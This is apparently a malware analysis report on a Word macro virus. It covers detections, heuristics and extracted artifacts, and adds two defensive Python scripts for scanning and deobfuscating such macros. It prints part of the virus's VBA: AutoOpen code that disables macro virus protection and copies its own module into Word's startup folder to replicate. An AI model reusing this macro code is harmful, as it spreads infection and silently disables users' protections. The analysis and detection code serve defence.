Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 571972ff8dafae5a…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 51.0 KB
Created: 1998-11-04 07:58:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: e60c7e1252a2e4a7e7dbe3ae49e42648
SHA-1: ea96565328759d55120ea3d3b5f4c2c954fbd870
SHA-256: 571972ff8dafae5aa499b3c8bfbe0e5e08f1b67935e9701a39d96431ceb428dc
Risk score: 262

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The sample carries legacy WordBasic macro-virus markers alongside AutoOpen/Auto_Close VBA macros, and ClamAV flags both the container (Doc.Trojan.Class-36) and the extracted macro module (Doc.Trojan.Class-18). The recovered VBA pads every statement with a junk numeric comment line and builds its strings from Chr() concatenations. In the visible (truncated) portion, AutoOpen disables Word's macro virus protection, the Normal template save prompt and conversion confirmations, pops taunting message boxes at random (the Chr() runs decode to "PRO ViRuS", "PRO GERBIL", "PAPPY IS OLD" and "PAPPY GERBIL"), compares the line count of its own first code module with that of the Normal template as an already-infected check, and, when the Normal template module is shorter than 174 lines, exports its own module to a path built from Application.StartupPath and the decoded string "GERBIL". That export is the self-replication step of a Word macro virus, not a download. The embedded URLs were extracted from the document body text, not from the macro, and nothing in the recovered code references them.

Heuristics 6

  • ClamAV: Doc.Trojan.Class-36 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Class-36
  • Legacy WordBasic macro-virus markers (severity: high, rule: OLE_LEGACY_WORDBASIC_MACRO_VIRUS)
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro, or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS, 2 related findings)
    Document contains VBA macro code
  • AutoOpen macro (severity: high, rule: OLE_VBA_AUTOOPEN)
    Macro named AutoOpen, which Word runs automatically when the document is opened
  • Auto_Close macro (severity: high, rule: OLE_VBA_AUTOCLOSE)
    Macro named Auto_Close, a close-time auto-execution name
  • Embedded URL (severity: info, rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Every URL below was found in document text (OLE body), not in macro code; several were extracted twice (once with a trailing non-printable byte) and are listed once here.
    • http://www.microsoft.com
    • http://www.pussy.com
    • http://www.hardcore.com
    • http://www.xxx.com
    • http://www.babe.com
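The legacy-marker heuristic above is a raw byte scan over the OLE streams, not a VBA decompile. The following Python is an added example, not the report's scanner or oletools code, of how such a check can be implemented: it looks for Word's auto-macro names together with the WordBasic infector calls the heuristic names, in both 8-bit and UTF-16LE encodings, over arbitrary stream bytes. The two sample streams are constructed here, not bytes from the sample; scan_ole() assumes the olefile package is installed.

```python
import re

# Word's auto-executing macro names, and the WordBasic calls the report's
# heuristic pairs them with (ToolsMacro/MacroFile/FileMacro/GlobMacro).
AUTO_MACROS = ("AutoOpen", "AutoClose", "AutoExec", "AutoNew", "AutoExit")
INFECTOR_CALLS = ("ToolsMacro", "MacroFile", "FileMacro", "GlobMacro")

# Constructed stand-ins for OLE stream contents (not bytes from the sample):
# the first carries a legacy auto macro plus infector calls, one of them in
# UTF-16LE; the second is a modern VBA AutoOpen, which alone must not fire.
LEGACY_STREAM = (b"\x00\x00Normal\x00AutoOpen\x00\x00ToolsMacro .Name = \"AutoOpen\"\x00"
                 + "MacroFile".encode("utf-16-le") + b"\x00\x00")
BENIGN_STREAM = b"Attribute VB_Name = \"ThisDocument\"\r\nSub AutoOpen()\r\nEnd Sub\r\n"


def _marker_pattern(name):
    """Match a marker as 8-bit text or as UTF-16LE, case-insensitively."""
    narrow = re.escape(name.encode("latin-1"))
    wide = re.escape(name.encode("utf-16-le"))
    return re.compile(b"(?P<narrow>" + narrow + b")|(?P<wide>" + wide + b")",
                      re.IGNORECASE)


def scan_bytes(data):
    """Return {marker: [(offset, encoding), ...]} for every marker present."""
    hits = {}
    for name in AUTO_MACROS + INFECTOR_CALLS:
        for m in _marker_pattern(name).finditer(data):
            encoding = "ascii" if m.group("narrow") is not None else "utf-16le"
            hits.setdefault(name, []).append((m.start(), encoding))
    return hits


def is_legacy_macro_virus(hits):
    """The heuristic needs an auto macro AND an infector call, not just one."""
    return (any(n in hits for n in AUTO_MACROS)
            and any(n in hits for n in INFECTOR_CALLS))


def scan_ole(path):
    """Scan every stream of an OLE file (assumes the olefile package)."""
    import olefile
    ole = olefile.OleFileIO(path)
    try:
        findings = {}
        for entry in ole.listdir(streams=True, storages=False):
            hits = scan_bytes(ole.openstream(entry).read())
            if hits:
                findings["/".join(entry)] = hits
        return findings
    finally:
        ole.close()


if __name__ == "__main__":
    for label, blob in (("legacy", LEGACY_STREAM), ("benign", BENIGN_STREAM)):
        hits = scan_bytes(blob)
        print(label, "->", "legacy macro virus" if is_legacy_macro_virus(hits)
              else "no legacy markers", hits)
```

Scanning every stream rather than only the VBA storage is the point: WordBasic macros from Word 6/95 live in streams that a VBA extractor never decompiles, and Word writes names in both narrow and wide form, so a scan that checks one encoding only will miss half the cases. Requiring an infector call next to the auto macro keeps a plain modern AutoOpen from tripping this rule, since that is already covered by OLE_VBA_AUTOOPEN.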

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 39723 bytes
SHA-256: 822c8e1249d4d21df31de74affa6e42e9a13ddbd2b1f5ff7f2f6e179e95e957f
Detection
ClamAV: Doc.Trojan.Class-18
Obfuscation or payload: unlikely (tool verdict; note that the preview below builds its strings from Chr() calls and interleaves a junk numeric comment line after every statement)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'243984400311939179247.61082934833639E+182439844003119391792424398440031193917924
Randomize
'87939381764325166756003.80352490531545E+2187939381764325166756008793938176432516675600
On Error GoTo 97
'828495628962393440359841.98295487630389E+228284956289623934403598482849562896239344035984
I = 0: o = 0: r = 0
'11680673292881692705963.36601110204948E+2011680673292881692705961168067329288169270596
Options.VirusProtection = False
'722168878242479113806491.79033883666218E+227221688782424791138064972216887824247911380649
Options.SaveNormalPrompt = False
'68626709089704153988814.83237709439228E+2168626709089704153988816862670908970415398881
Options.ConfirmConversions = False
'197686412011678737561763.3186360529075E+211976864120116787375617619768641201167873756176
    If Day(13) And Month(10) Then Call ©
'30928849956544750932011.68485198395284E+2130928849956544750932013092884995654475093201
    If Day(13) And Month(11) Then Call ê
'236292235244766148791291.12620395138034E+222362922352447661487912923629223524476614879129
    If Day(13) And Month(12) Then Call Ï
'81759572412322271211.89867901149653E+1881759572412322271218175957241232227121
lx = Int(Rnd(1) * 100) + 1
'835805446095629695979694.70533055965588E+228358054460956296959796983580544609562969597969
    If lx = 99 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'6148416164763084028012.92854228092546E+20614841616476308402801614841616476308402801
    lr = Int(Rnd(1) * 75) + 1
'90761805289342083520253.10481178575062E+2190761805289342083520259076180528934208352025
    If lr = 74 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(71) + Chr(69) + Chr(82) + Chr(66) + Chr(73) + Chr(76)
'7659050256822559608096.30002537691697E+20765905025682255960809765905025682255960809
    ls = Int(Rnd(1) * 50) + 1
'19866620601446582556258.87208621204349E+2019866620601446582556251986662060144658255625
    If ls = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(65) + Chr(80) + Chr(80) + Chr(89) + Chr(32) + Chr(73) + Chr(83) + Chr(32) + Chr(79) + Chr(76) + Chr(68)
'6362501761817171960891.15617597993853E+20636250176181717196089636250176181717196089
    lt = Int(Rnd(1) * 25) + 1
'224577198813433936560047.71183853545031E+212245771988134339365600422457719881343393656004
    If lt = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(65) + Chr(80) + Chr(80) + Chr(89) + Chr(32) + Chr(71) + Chr(69) + Chr(82) + Chr(66) + Chr(73) + Chr(76), vbCritical
'40207012813454312547561.38887588849489E+2140207012813454312547564020701281345431254756
gx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'133312425214209777735845.61215679559893E+211333124252142097777358413331242521420977773584
xg = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'919114425611841396832251.69245439179353E+229191144256118413968322591911442561184139683225
If xg > 174 And gx > 0 Then GoTo 97
'509346219693171221544961.61524970572486E+225093462196931712215449650934621969317122154496
If xg < 174 Then
'376325080815368390322492.02025992193067E+223763250808153683903224937632508081536839032249
 Set sx = NormalTemplate.VBProject.VBComponents.Item(1)
'760220698411558496692841.1848014443005E+227602206984115584966928476022069841155849669284
 ActiveDocument.VBProject.VBComponents.Item(1).Name = sx.Name
'442803640413815298177611.68942792229535E+224428036404138152981776144280364041381529817761
 ActiveDocument.VBProject.VBComponents.Item(1).Export Application.StartupPath & Chr(71) + Chr(69) + Chr(82) + Chr(66) + Chr(73) + Chr(76)
'27797225625301168257648.37164200
... (truncated)
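To read a module like the one previewed above, a practitioner first strips the junk comment lines and decodes the Chr() concatenations. The following Python is an added example, not part of the report or of the sample's own code: it cleans the source, replaces each Chr() run with the string it builds, and flags the API usage that marks this as a macro virus (disabling Options.VirusProtection, walking VBProject.VBComponents, exporting a module toward Application.StartupPath). SAMPLE_VBA is a constructed excerpt made of lines copied from the preview above; the indicator names are this example's own labels.

```python
import re

# Constructed sample input: lines copied from the macro preview in this
# report, including the junk numeric comment lines the sample interleaves.
SAMPLE_VBA = """Sub AutoOpen()
'243984400311939179247.61082934833639E+182439844003119391792424398440031193917924
Randomize
'87939381764325166756003.80352490531545E+2187939381764325166756008793938176432516675600
On Error GoTo 97
Options.VirusProtection = False
Options.SaveNormalPrompt = False
    If lx = 99 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
gx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
 ActiveDocument.VBProject.VBComponents.Item(1).Export Application.StartupPath & Chr(71) + Chr(69) + Chr(82) + Chr(66) + Chr(73) + Chr(76)
"""

# A junk line is a VBA comment made only of digits, '.', 'E' and '+'.
JUNK_COMMENT = re.compile(r"^\s*'[0-9.E+]+\s*$")

# A run of Chr(n) calls joined with + or &; the whole run builds one string.
CHR_RUN = re.compile(r"(?:Chr\(\s*\d+\s*\)\s*[+&]\s*)*Chr\(\s*\d+\s*\)", re.IGNORECASE)
CHR_ARG = re.compile(r"Chr\(\s*(\d+)\s*\)", re.IGNORECASE)

# Behaviour a practitioner reads as macro-virus tradecraft; matched against
# the cleaned source, case-insensitively. Labels are this example's own.
INDICATORS = {
    "auto-execution entry point":
        r"\bSub\s+(AutoOpen|AutoClose|Auto_Close|AutoExec|Document_Open|Document_Close)\b",
    "disables macro virus protection": r"Options\.VirusProtection\s*=\s*False",
    "suppresses Normal template save prompt": r"Options\.SaveNormalPrompt\s*=\s*False",
    "inspects a VBA project (VBProject.VBComponents)": r"VBProject\.VBComponents",
    "exports a code module (self-replication)": r"\.Export\s",
    "targets the Word startup folder": r"Application\.StartupPath",
}


def strip_junk(src):
    """Return (original line number, text) pairs without the padding comments."""
    return [(n, line) for n, line in enumerate(src.splitlines(), 1)
            if not JUNK_COMMENT.match(line)]


def chr_run_text(run):
    """Decode 'Chr(80) + Chr(82)' into the text it builds ('PR')."""
    return "".join(chr(int(n)) for n in CHR_ARG.findall(run))


def vba_literal(text):
    """Quote text as a VBA string literal, doubling embedded quotes."""
    return '"' + text.replace('"', '""') + '"'


def analyse(src):
    """Clean the source, decode its Chr() strings and collect indicators."""
    cleaned, strings = [], []
    for n, line in strip_junk(src):
        for m in CHR_RUN.finditer(line):
            strings.append(chr_run_text(m.group(0)))
        cleaned.append((n, CHR_RUN.sub(
            lambda m: vba_literal(chr_run_text(m.group(0))), line)))
    indicators = {}
    for name, pattern in INDICATORS.items():
        hits = [n for n, line in cleaned if re.search(pattern, line, re.IGNORECASE)]
        if hits:
            indicators[name] = hits
    return {"source": "\n".join(line for _, line in cleaned),
            "strings": strings, "indicators": indicators}


if __name__ == "__main__":
    result = analyse(SAMPLE_VBA)
    print(result["source"])
    print("decoded strings:", result["strings"])
    for name, lines in result["indicators"].items():
        print(f"{name}: line(s) {lines}")
```

Run against the full extracted macros.bas, the same pass turns every MsgBox argument and the Export target into plain text and leaves a module short enough to read in one sitting; the line numbers in the indicator list refer to the original file so findings can be cited against the untouched artifact.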